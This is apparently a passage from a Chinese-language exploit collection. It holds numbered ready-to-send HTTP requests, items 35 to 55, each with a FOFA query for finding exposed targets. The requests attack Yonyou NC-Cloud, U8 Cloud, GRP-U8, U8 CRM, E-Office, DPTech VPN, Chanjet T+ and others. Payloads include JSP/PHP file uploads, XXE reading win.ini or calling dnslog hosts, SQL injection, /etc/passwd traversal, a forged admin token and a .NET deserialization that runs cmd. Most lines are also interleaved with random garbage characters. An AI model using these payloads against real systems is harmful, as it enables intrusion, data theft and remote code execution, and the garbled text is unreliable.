4 Y/ C0 i( \1 \7 v  _# [& T1 W- jAccept-Encoding: gzip, deflate: o, [; v  a1 U/ d  {
Accept: */*
* e- Z7 a) b" LConnection: keep-alive
+ V8 E- I6 N. Y) v/ z6 S) a. U+ ^7 [

* g# k% L& |1 u, r: |3 K) B( i/ A$ X35. 用友NC-Cloud importhttpscer任意文件上传% g- p" a  z& H* e0 Q7 @
FOFA:app="用友-NC-Cloud"
* ~* s8 N9 r. f5 K* l; S5 HPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.17 ?/ L' E1 F0 ?3 I& f
Host: 203.25.218.166:8888! q0 w3 C" [. P6 x0 v
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 m+ F! q* b. D9 d
Accept-Encoding: gzip, deflate
  E2 Z- ^" |4 E  ?9 z* ~4 H& H3 D/ S' [Accept: */*
% u7 h4 J3 h7 h7 mConnection: close
' q8 S/ d2 v' Y7 aaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
; z9 h/ g+ F2 A/ U2 o' hContent-Length: 190
" |' E4 L2 t6 NContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0+ D0 `2 ]; i: V
: F, N  n+ {8 [2 L  ?" [! M2 e
--fd28cb44e829ed1c197ec3bc71748df0, f( h" c& i' H  M
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
# a# a+ O. K$ ~7 z1 K0 R& g3 h! L) x7 Y7 \+ p
<%out.println(1111*1111);%>
# ^; u/ k: l; O9 g3 x0 l--fd28cb44e829ed1c197ec3bc71748df0--
. d. L5 u. t0 Z' D8 z' q2 @  R/ [  @2 `
; L- Y! l4 X/ n! W; Q6 ?
36. 用友NC-Cloud soapFormat XXE
0 M* V+ [% l! Q( }. z; k, \FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
3 g; s8 u0 ]) S* `POST /uapws/soapFormat.ajax HTTP/1.1
7 {* D8 o0 ?1 |Host: 192.168.40.130:8989# n- C( \1 \" C5 m1 H+ v5 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
9 F' c8 U( J7 vContent-Length: 2636 R( ^1 z" u9 R8 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 }9 U' Q3 H8 y0 U, T2 Y( F
Accept-Encoding: gzip, deflate
- a% c9 ]5 d& qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 p$ ~7 r/ }( F6 _& d+ o& SConnection: close
6 Y! A7 z$ x% t! I3 O) DContent-Type: application/x-www-form-urlencoded
. ]3 }  Z5 j- X$ v. D5 ]Upgrade-Insecure-Requests: 18 k- u" z* _7 l* z! Q
# r7 X; g/ z& o0 F
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 X9 d4 G. I! ^, |+ |3 ~+ |" `+ g: J0 n

8 W& J9 p9 ~/ o$ j" J7 z" C$ D' }37. 用友NC-Cloud IUpdateService XXE
4 |9 I7 M9 F4 U8 a8 o9 H9 QFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- a2 S7 `2 y/ |' H" H! rPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1' J/ T$ b. l' H7 @
Host: 192.168.40.130:8989
" v2 j, M3 D7 f6 J5 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# b- u' d4 {' J, S/ L: qContent-Length: 421/ [9 m+ E0 d" ?9 w( }# p+ L9 `, u+ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ z1 k$ b7 B" ]4 J' d
Accept-Encoding: gzip, deflate# b5 S; ^7 t' N1 a
Accept-Language: zh-CN,zh;q=0.9* N4 Y4 S$ F7 i' q' T* l
Connection: close
( ^1 `' }! H4 D, ZContent-Type: text/xml;charset=UTF-8
* i+ \) N$ F" \" eSOAPAction: urn:getResult
- l( f5 C9 u+ i, W% R$ YUpgrade-Insecure-Requests: 1* A3 K2 F8 h- O: N$ I& U

* }- v( K% v$ N4 c/ D' p6 I0 V1 Y3 H<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
; [+ ~5 U' B- y: c3 p+ X<soapenv:Header/>! a- s9 q7 |0 K
<soapenv:Body>) M+ Y: e% e) C( W, n) e  ~/ d
<iup:getResult>6 _1 i0 e: A/ [* A* Q6 u9 m( x9 d
<!--type: string-->
) i0 u& X. T/ W6 s<iup:string><![CDATA[
1 K7 w5 M+ p: M# y+ M# y8 F  k  ~<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
! H5 i& q# w% |. u! s. X5 {$ J9 y: |<xxx/>]]></iup:string>
/ `# o( S: E# J7 u' G- y, Q</iup:getResult>7 z: r6 j6 E* N% _
</soapenv:Body>3 L, i4 \! P; i9 c
</soapenv:Envelope>
5 t0 w: o8 S5 d5 R9 h
( d' O7 W2 i' K% [! q4 I+ V' @) T8 K7 x
2 T4 K/ Y3 `; s, P! z- X$ M
38. 用友U8 Cloud smartweb2.RPC.d XXE. M! d) M" r$ s! j. q( [( }& ?) j  p
FOFA:app="用友-U8-Cloud"
9 C) M7 K( I; m* A, ^POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.19 f3 p' E  r- ?8 n
Host: 192.168.40.131:8088
  U; G! [; v& X/ U# m% kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
! l3 g  d9 G- m  q' ]Content-Length: 260" l. T* e' m  V7 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
$ A6 i! J: G: \* xAccept-Encoding: gzip, deflate
" n5 X' B( ]0 L7 ~+ B: B6 KAccept-Language: zh-CN,zh;q=0.9
7 a1 I: k8 B, q* m5 BConnection: close) {4 F* S+ a. X4 v% t' o( z7 m  A
Content-Type: application/x-www-form-urlencoded, n3 j* w, S! Z( g
1 A5 m, g/ b0 K# W
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>- J+ H* [' ^1 N6 S. N# L/ _
- i& S+ W: S, p: D" V- _

+ @" @1 H$ Z7 @$ S6 s* ^39. 用友U8 Cloud RegisterServlet SQL注入
8 M* K4 E8 d& s% h5 ZFOFA:title="u8c"
, W0 L& R. D* j4 I. DPOST /servlet/RegisterServlet HTTP/1.1! l2 l0 t% o: H: K5 a+ ^9 W& E, D/ e
Host: 192.168.86.128:8089: l" C. ]9 g9 Z& e$ n0 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
2 T% T7 q# z* s( T7 x6 IConnection: close
/ E1 H, J4 t# `+ @6 Z4 x1 [' r% n8 GContent-Length: 85+ I8 n( j0 x& {+ @* N% k8 G
Accept: */*" c: {* B8 O4 ]/ y+ H, m
Accept-Language: en; a" l! I- z7 Q  t1 a5 }
Content-Type: application/x-www-form-urlencoded
% T1 ]" P5 J. N' uX-Forwarded-For: 127.0.0.1
8 V9 s1 i3 }5 T0 ^8 B; |) k8 yAccept-Encoding: gzip& o1 j! M" |" y# p* w4 `; w  X' V

" W* p" C/ G; |, ?1 y! p& iusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
: m+ `! ~$ x- r6 p4 n6 d
1 O9 Y/ h8 p: Y9 p# V: M
5 }! Y0 q1 O: r; m+ d40. 用友U8-Cloud XChangeServlet XXE
' H! K7 `7 ~6 n# k. }/ kFOFA:app="用友-U8-Cloud"! x/ A5 _$ e( ?3 t9 g" L
POST /service/XChangeServlet HTTP/1.1
% X, `9 q" p! u) A8 C" i- vHost: x.x.x.x
& ^. q" F; d+ H; u; v0 r( o( bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 N7 I7 V( G; b5 Z& M0 c1 P3 V* c7 _$ jContent-Type: text/xml
& k3 c' _8 V7 S1 ^; s# W- a" xConnection: close, g9 |' f8 }; z! N
: \- ]' p4 w9 P7 i: p: m
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>* x. j* @, M) ]. }- U

; m0 e+ ^1 P! a2 W8 f
( t5 S9 Y$ C6 L3 U; B; ?41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 X; q- B) Z5 ?' nFOFA:app="用友-U8-Cloud"
& m* \/ X' b4 g4 r+ s8 V8 N5 nGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
3 i6 u  W6 g: E9 g& f7 X' @1 J/ B+ IHost:2 s5 L$ |( D& k) I. K2 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% J2 k5 T$ z* e# t8 b' w  L8 `8 Y3 kContent-Type: application/json
/ X& O1 |, m9 v- y$ TAccept-Encoding: gzip
) c% ]4 |- m. G1 HConnection: close
6 R6 r3 H/ \+ E
, V- B- b( K3 Z- G4 J! `, ~  o6 W5 K4 s3 v, B! G1 R6 R. B
42. 用友GRP-U8 SmartUpload01 文件上传! t1 m: g1 P- M0 |2 [) k; b% x
FOFA:app="用友-GRP-U8"9 s8 y  O- C# o8 N0 c* a, u0 m7 {
POST /u8qx/SmartUpload01.jsp HTTP/1.1
5 r9 V3 b0 S. L( k. {9 yHost: x.x.x.x* Q1 Y& Q' E, X- F9 w: w9 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
: C- E8 z* o" H" N, h9 d& C* r; g) q: PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
7 A, L' g8 X" K% E2 |' p
! v) G# G6 t2 q& |2 MPAYLOAD
# T4 b; t9 K- F5 i5 H* W* a3 k; T" h1 {7 R7 \$ Z# A

: k% r& m1 `9 A( G- A3 @: r) }8 J& ehttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 G1 @* l# Z9 w3 Y* p
( x. s  t7 A$ Q& v0 m43. 用友GRP-U8 userInfoWeb SQL注入致RCE: g) }. R) _$ |& d+ s
FOFA:app="用友-GRP-U8"1 i0 F  c- u6 g& p+ v
POST /services/userInfoWeb HTTP/1.1- U2 q- G& [2 f2 M0 J* h
Host: your-ip
: C/ L2 V7 w$ ^* b1 b" U# ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) O. g& k8 J5 g, i! b- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! H) V( o1 a6 k; S7 R  \, zAccept-Encoding: gzip, deflate
$ C; g8 d4 U& s) s( QAccept-Language: zh-CN,zh;q=0.94 P8 P" B$ W6 }1 i( ~9 C
Connection: close
) K7 f9 X1 g9 b0 U7 sSOAPAction:. W. K/ M- v# V! O8 j* ?3 f
Content-Type: text/xml;charset=UTF-82 @  q. ~) w( O( Z: w) r
" A. U/ J6 X5 n
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">. {, A2 h: B& h8 O: ?; K5 q" C
   <soapenv:Header/>; K0 `$ |0 R; h4 v: i
   <soapenv:Body>& `" h9 o, g. F1 d
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">$ z. O  D" z* ^, f
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
+ Z) ]: v* B- H/ j2 S6 v. L      </ser:getUserNameById>7 U/ g$ G( d, ^
   </soapenv:Body>
: j, B, N0 P# `: e</soapenv:Envelope>
2 V( w! p# M2 R5 c$ a* B/ c  f* o! O  z

" s6 m- f( K9 C" `" U, c% O8 i0 `44. 用友GRP-U8 bx_dj_check.jsp SQL注入4 x5 x$ t2 q0 @+ U* k
FOFA:app="用友-GRP-U8"
. d8 a6 B& r% @% C0 EGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 D$ a& j+ Y& |- z( L
Host: your-ip3 V* C! A+ Z6 ^' N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36* K1 l! B3 `% T5 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! Z8 s. {' p  pAccept-Encoding: gzip, deflate6 z2 _! Z9 L5 }3 {) Z) A
Accept-Language: zh-CN,zh;q=0.9# \7 E" o/ n1 a  L& Q# e5 Q
Connection: close
5 H; S. C3 i& {- U  t0 o5 h/ p4 ]6 M! D2 {* c
  W' o7 ]! E' j: P% o* R
45. 用友GRP-U8 ufgovbank XXE0 N$ k6 l& l. I7 B
FOFA:app="用友-GRP-U8"5 G$ q8 K: K1 s  H# I0 G
POST /ufgovbank HTTP/1.1
/ Y9 W4 j) _  |: ^3 H) V9 w/ u6 f- \Host: 192.168.40.130:222) m6 C: y1 B/ L% \1 w) ]# y; o) w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
% g5 n* y. }2 r* DConnection: close
! x( f9 p* A, C/ i" k6 |Content-Length: 161
5 c/ x+ R% B. F5 y4 ~8 L4 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 |% U0 e( Z7 |4 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 A; {: n, L; y# f
Content-Type: application/x-www-form-urlencoded
" [6 U2 V# {( y% ZAccept-Encoding: gzip
3 ]: d% Q) l, h  `4 q% Q* g8 _. K. T* u! ]* y1 J3 |0 P
reqData=<?xml version="1.0"?>
4 I+ V/ i* r- n9 |; Q3 Z- _<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
0 B! K# J. m% i& T: w' Z2 ~# l0 h" z/ z) Y

7 k$ s) d$ U0 `6 |46. 用友GRP-U8 sqcxIndex.jsp SQL注入8 Q6 l: z/ N! H2 b; O; @
FOFA:app="用友-GRP-U8"
9 O  V* i, o: R: [5 m* q  f. [GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1% A3 [# n+ s) T, R% `
Host: your-ip; Z5 r* |0 U: m9 Q6 ^3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36! F8 a* t" Y! |- S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 y# l2 i# @- F
Accept-Encoding: gzip, deflate
- y1 Q( b! `& H' Q- UAccept-Language: zh-CN,zh;q=0.9- i0 m; r7 \2 \: M, o
Connection: close
* K, [+ G5 j$ W. U2 z" b' I  {% z; u

1 \& ~, U0 E" t; S47. 用友GRP A++Cloud 政府财务云 任意文件读取9 I9 L4 U$ o! W! q  F
FOFA:body="/pf/portal/login/css/fonts/style.css"( g2 D! V& G% f- N* {
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
/ B5 ~) }  X( c5 tHost: x.x.x.x- h' w' _3 q( T9 C  y
Cache-Control: max-age=0. D% n  ?% \+ F
Upgrade-Insecure-Requests: 18 z6 s8 }$ ?9 I* G+ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 }, v# I4 N3 V& `& K8 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# S% M& i: g  z4 `Accept-Encoding: gzip, deflate, br
0 b+ _' o* ]( N: LAccept-Language: zh-CN,zh;q=0.98 k# \; c! y' ?+ l4 j. v( ~
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 p6 k1 o/ Z, J% }" ?" ^! YConnection: close& ?7 r; ~& V; u8 n+ s( I
( D" j8 e, M" r1 \* j, q" M: Z" v2 `

  }& \+ g% u  _1 M
9 C" Q- f" @+ R, L7 a" e7 V48. 用友U8 CRM swfupload 任意文件上传
6 X! a, r& P  ?  WFOFA:title="用友U8CRM"
# l; A- I- B) R3 C5 A8 f3 g& z& Z  yPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
, f& d' c, t: ^: R% d9 v8 P8 ^% aHost: your-ip+ b  E  u( L4 [2 t8 G, m4 T- |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; t) D6 o  q3 l8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  x9 i& i7 |1 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) q& o2 {  c3 G0 ~8 }( f- L4 ^Accept-Encoding: gzip, deflate
; M8 w  i5 W9 c* K2 |3 n5 eContent-Type: multipart/form-data;boundary=----269520967239406871642430066855) `5 L! R1 [4 x! J8 ?
------269520967239406871642430066855: f& a7 k6 f$ c1 U) M
Content-Disposition: form-data; name="file"; filename="s.php"
/ A! V! H0 C# B1 w" k; P12314 `  m( S; K+ r
Content-Type: application/octet-stream
( j( u: o- J5 N7 ~------269520967239406871642430066855' h& z1 @7 [' n8 r. x- c
Content-Disposition: form-data; name="upload"
* ^6 @8 j2 v% s1 U# n) gupload0 d5 [9 u- z0 m4 k) H* b
------269520967239406871642430066855--
6 [7 l% j7 F  [5 q# Z7 l: {+ d
5 t! ?% S5 R+ }& C9 `5 k" i1 `: k4 G
: d9 W5 g$ k1 D0 B9 J7 ^5 g49. 用友U8 CRM系统uploadfile.php接口任意文件上传; X" v$ V: w$ q8 J! v8 \  U
FOFA:body="用友U8CRM"
  L. W& k: Q3 j3 o* S" W0 a
  c. @. \+ N/ t2 x& R* ~2 DPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
" s) B/ Q0 `, B# s+ EHost: x.x.x.x
4 E8 _. t2 y  I$ o) _8 s8 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 E  O! ?0 _! X2 B
Content-Length: 329
, X! l. C; C8 a/ g; tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( `) R6 Q' ]: H( O7 J
Accept-Encoding: gzip, deflate! X: R9 T7 J9 R! v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, }* |) N4 E8 d- ?) |3 I  TConnection: close5 K2 Q+ A( r1 s. f. T2 v% K9 m
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
5 C7 e6 @) c) v8 ]7 W9 W
! J  L* Z( H7 B-----------------------------vvv3wdayqv3yppdxvn3w! m. `% U0 z. U' \
Content-Disposition: form-data; name="file"; filename="%s.php "
' T% B0 s4 \+ KContent-Type: application/octet-stream
) |7 m* r/ D0 z: V# M4 w, _. R; [
6 |9 s. }( J5 G! ]" h& C! R# qwersqqmlumloqa
6 m3 N# s3 L6 ?/ e: o& z- b-----------------------------vvv3wdayqv3yppdxvn3w; E1 l* z' d4 n$ ]6 I
Content-Disposition: form-data; name="upload"
! P% {/ w/ v# A0 u6 W" L$ ~
- x; `% }1 f! M$ T4 o7 nupload
8 X9 e3 s2 T' m- L: J; Y, B-----------------------------vvv3wdayqv3yppdxvn3w--
, Q4 K) U" g# e. N( u9 L7 i3 l% R/ g% |% C% ~1 l

9 T3 |  Y: o/ b* q  v% E# Rhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
; u/ e0 p/ M' x( v" W5 X
! O3 t1 L* f6 c: K; U$ g50. QDocs Smart School 6.4.1 filterRecords SQL注入
9 ^; _9 T2 W8 X0 T/ uFOFA:body="close closebtnmodal"
+ _  }; k4 {1 e1 H3 r8 oPOST /course/filterRecords/ HTTP/1.1" S% s/ z7 ?2 D6 i; |9 e, p
Host: x.x.x.x0 F7 J, K9 Q2 t& s, @
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 q; b8 ^7 l" m/ @. v8 J- x8 y% ~
Connection: close
& S6 L- c4 p$ Z5 \' `Content-Length: 224, V4 T, K1 t# U; d$ S
Accept: */*
) l1 v# b  B0 E& _, YAccept-Language: en4 ]1 Y3 _- Z- t& b. A( C* s
Content-Type: application/x-www-form-urlencoded$ E. T. {, Q9 R
Accept-Encoding: gzip
; o9 F3 ?+ ]3 v% y
  W* L+ ?- N, E# `: @$ h5 isearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1; ~, p6 x' W2 M

3 f- B+ u3 s+ G7 B( _) Y5 Q% M( F3 m+ {$ D2 \; J7 n
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
/ I. Y) k. I% _: e* t) _2 Y! CFOFA:app="云时空社会化商业ERP系统"
2 n0 x( J8 ~1 w2 c2 b3 EGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, S6 G* Z" o6 B! `% U+ W7 V" N
Host: your-ip
% Z9 N4 J' X- W( VUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: K2 D  T4 M" s/ n( T! a/ D/ U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: Q* m7 V) y1 |* b0 v  W+ kAccept-Encoding: gzip, deflate
8 M4 k0 W' H/ Z$ P. ^/ FAccept-Language: zh-CN,zh;q=0.9  N3 N% L6 k% Y
Connection: close
5 E; p. F; t7 a  ^# W7 K, d3 c' G2 ~3 {- k7 a8 E! l

% G) J& l- R0 `* K  z$ ?52. 泛微E-Office json_common.php sql注入
  t/ T$ Y6 C9 J/ s! N9 {! l% vFOFA:app="泛微-EOffice"
2 I5 B9 G5 R% U2 ?. H2 M% RPOST /building/json_common.php HTTP/1.1: [7 c6 p8 q) {
Host: 192.168.86.128:8097& ^9 o4 K: G: [5 W
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ y1 R+ T9 B* j/ o3 M* e! q6 F0 \Connection: close
' y6 d2 C4 D# ]$ q4 g- K" b8 A0 S8 dContent-Length: 87! _& s* Q( N; m* a
Accept: */*. O8 x* h% B* z) T. k" _0 x
Accept-Language: en
" l+ E+ I# ~  e, s; O6 q9 n' ^Content-Type: application/x-www-form-urlencoded
" [- R4 Q  z4 {* E) ], ?! N- S: oAccept-Encoding: gzip
  R# u; A2 t8 K- M# y# j# Q
+ \* p: [$ Y% P/ \2 e# a( Ztfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
) l% x' N# w( @+ e" I$ p: c
/ f$ m9 J4 w9 m. ]7 x4 i' {6 d( i$ i- Z  Z2 L2 }* q# }- \
53. 迪普 DPTech VPN Service 任意文件上传
9 L  D4 p; Q5 s4 X+ aFOFA:app="DPtech-SSLVPN", v/ P, ]/ c! v$ z5 b" `/ r, C
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
) H. J6 B. y  B0 F7 Z# @
' n, C; h- H( f. s0 f' u' m( k7 V) D' X0 b- _) r
54. 畅捷通T+ getstorewarehousebystore 远程代码执行7 i4 b3 i/ X: y1 M' ?- k
FOFA:app="畅捷通-TPlus"9 Z& r5 e, a: H. R. P& q4 [
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
6 c0 G2 J. f$ v/ O6 M"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt") r2 L* h0 O6 r. D

" d2 i8 T$ q  Q; v3 F5 u7 m
" y, w, b/ E* o1 K  d完整数据包  @2 q/ K8 G9 a5 F
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1! E# a  F) S/ @2 s1 W
Host: x.x.x.x
6 Z5 O( T% L+ }5 oUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
( U, w( h! ]" o. L1 j: TContent-Length: 593- h  g, Q( Y3 x" U, I. v. T7 z+ b
* w2 `2 f) z/ o4 o: P* `
{
% U. J* h+ \4 ]: Q; ^0 Q"storeID":{1 o& [3 U; r! N. ~1 N; @3 S
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",# M* K) U0 Y+ U/ J  |6 `
"MethodName":"Start",& N% d5 b) a, Z5 U$ R+ i
  "ObjectInstance":{
; r( x( N/ f3 U, M) e7 ^1 J+ C! A$ `   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% ?. o% c! A$ Y8 U, t  m8 z    "StartInfo":{
' P$ v& F' F8 ?) r7 t' ]) u   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% t& u. O8 A6 g* F( t/ h/ E3 L    "FileName":"cmd",
7 }4 _4 N/ `7 F6 L/ f. J/ U5 d. N2 R    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
  T' E3 j" A( ?. F    }, U2 w) A) D6 c3 D
  }3 L% j& A1 p. L
  }
  Z0 g3 R2 }/ A: h}3 g+ O9 h6 P7 G2 k5 Y. J* }) g

6 b" w' O3 b* k3 ?3 n* [9 g7 J; o2 D5 _- H$ k( G
第二步,访问如下url! }! J# J- x4 K9 y
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
, A2 ]# L& J  D9 t+ W# z3 B
( q% G5 P2 D9 R% G; S. v
1 s, B9 W; e% O& c55. 畅捷通T+ getdecallusers信息泄露
3 Y% L: D0 \3 W. BFOFA:app="畅捷通-TPlus"
- p+ |1 C, O; D% `第一步,通过
$ _0 F" E& Z2 U7 ~/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
* Z6 V4 Q2 s2 L6 m3 N: ^3 H第二步,利用获取到的Cookie请求
